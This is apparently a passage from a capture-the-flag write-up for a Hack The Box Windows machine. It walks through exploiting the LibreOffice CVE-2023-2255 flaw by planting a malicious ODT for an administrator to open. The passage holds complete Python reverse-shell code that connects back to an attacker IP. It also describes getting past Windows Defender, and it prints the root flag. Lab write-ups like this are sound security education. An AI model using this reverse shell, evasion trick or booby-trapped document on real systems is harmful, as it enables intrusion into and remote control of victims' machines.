Program 'winPEASany.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1
+ ./winPEASany.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ ./winPEASany.exe
+ ~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed

There's that hacker guy from the earlier picture!
CVE-2023-2255 LibreOffice exploit
At this point all I really had to work with was the LibreOffice install. I Googled LibreOffice exploits and quickly came upon CVE-2023-2255. Searching for a PoC landed me at a GitHub repository by elweth-sec.
This Python script generates an ODT file that runs a given command when opened. I guessed that uploading it into Important Documents would cause the administrator to open the file and run the command. I first tried a basic PowerShell reverse shell payload, but this did not seem to work.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop/CVE-2023-2255]
└──╼ [★]$ python3 CVE-2023-2255.py --cmd 'powershell -e <...>' --output 'exploit.odt'
File exploit.odt has been created !
My first thought was that Defender might be blocking it, just as it blocked winPEAS. To get around this I remembered that Python was installed on the box and figured Defender was probably only catching the PowerShell and cmd payloads, not Python. To test this I created a Python reverse shell with revshells and uploaded it to the victim host.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ cat exploit.py
import os,socket,subprocess,threading;
def s2p(s, p):
    # socket -> process stdin
    while True:
        data = s.recv(1024)
        if len(data) > 0:
            p.stdin.write(data)
            p.stdin.flush()
def p2s(s, p):
    # process stdout -> socket, one byte at a time
    while True:
        s.send(p.stdout.read(1))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.234",42069))
p=subprocess.Popen(["powershell"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
    p.wait()
except KeyboardInterrupt:
    s.close()
*Evil-WinRM* PS C:\users\public> upload exploit.py
Info: Uploading exploit.py to C:\users\public\exploit.py
Data: 936 bytes of 936 bytes copied
Info: Upload successful!
I then confirmed that this does indeed bypass Defender and give a reverse shell.
*Evil-WinRM* PS C:\> python C:\users\public\exploit.py
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop]
└──╼ [★]$ nc -lvnp 42069
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::42069
Ncat: Listening on 0.0.0.0:42069
Ncat: Connection from 10.129.28.249.
Ncat: Connection from 10.129.28.249:60193.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\> whoami
mailing\maya
Lastly, I uploaded exploit.odt to the _Important Documents_ directory and after a couple of seconds got a shell as the administrator, then grabbed root.txt from their desktop to complete the machine.
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop/CVE-2023-2255]
└──╼ [★]$ python3 CVE-2023-2255.py --cmd 'python C:\users\public\exploit.py' --output 'exploit.odt'
File exploit.odt has been created !
*Evil-WinRM* PS C:\Important Documents> upload /home/htb-mp-904224/Desktop/exploit.odt
Info: Uploading /home/htb-mp-904224/Desktop/exploit.odt to C:\Important Documents\exploit.odt
Data: 40688 bytes of 40688 bytes copied
Info: Upload successful!
┌─[us-dedivip-1]─[10.10.14.234]─[htb-mp-904224@htb-tigqwhdc1v]─[~/Desktop/CVE-2023-2255]
└──╼ [★]$ nc -lvnp 42069
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::42069
Ncat: Listening on 0.0.0.0:42069
Ncat: Connection from 10.129.28.249.
Ncat: Connection from 10.129.28.249:59317.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\users\localadmin\Desktop> type root.txt
051b6816153f6a4c2821f7eac90c15e6

Keep hacking frens, thanks for reading!
Additional Resources
Ippsec video walkthrough
0xdf Writeup
0xdf.gitlab.io